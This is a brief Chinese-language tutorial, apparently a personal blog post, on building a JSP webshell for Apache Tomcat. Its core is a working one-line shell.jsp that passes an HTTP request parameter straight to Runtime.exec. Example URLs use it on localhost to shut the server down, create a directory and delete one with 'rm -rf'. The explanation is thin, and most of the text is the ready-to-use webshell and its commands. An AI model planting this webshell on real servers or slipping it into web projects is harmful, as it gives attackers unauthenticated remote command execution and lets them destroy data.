tomcat下jsp shell（webshell）

首先要了解，什么是服务器，什么是web，服务器就是和电脑一样的，有操作系统，操作系统与磁盘，网卡，内存等等组合起来的就叫服务器，web内，是服务器上面的一个应用，tomcat就是一个应用，可以解析jsp文件，tomat运行之后，丢jsp进去，可以马上解析jsp文件，tomcat运行之后java sdk以及运行，jsp可以条用java sdk api，java api可以条用系统shell，这样就形成了jsp可以直接条用shell指令了，jsp调用java api 用“<% API %>”进行引用；

jsp代码:

<%
	Runtime.getRuntime().exec(request.getParameter("shell"));
%>

jsp文件名为shell.jsp,上面是jsp内容；

关闭服务器:

http://localhost:8080/shell.jsp?shell=shutdown

 

获取web根目录

huangxudong@huangxudong-X456UR:~/tomcat8/apache-tomcat-8.5.42/webapps/ROOT$ pwd
/home/huangxudong/tomcat8/apache-tomcat-8.5.42/webapps/ROOT
huangxudong@huangxudong-X456UR:~/tomcat8/apache-tomcat-8.5.42/webapps/ROOT$ 

创建文件夹: 

http://localhost:8080/shell.jsp?shell=mkdir /home/huangxudong/tomcat8/apache-tomcat-8.5.42/webapps/ROOT/a

删除文件夹:

http://localhost:8080/shell.jsp?shell=rm -rf /home/huangxudong/tomcat8/apache-tomcat-8.5.42/webapps/ROOT/a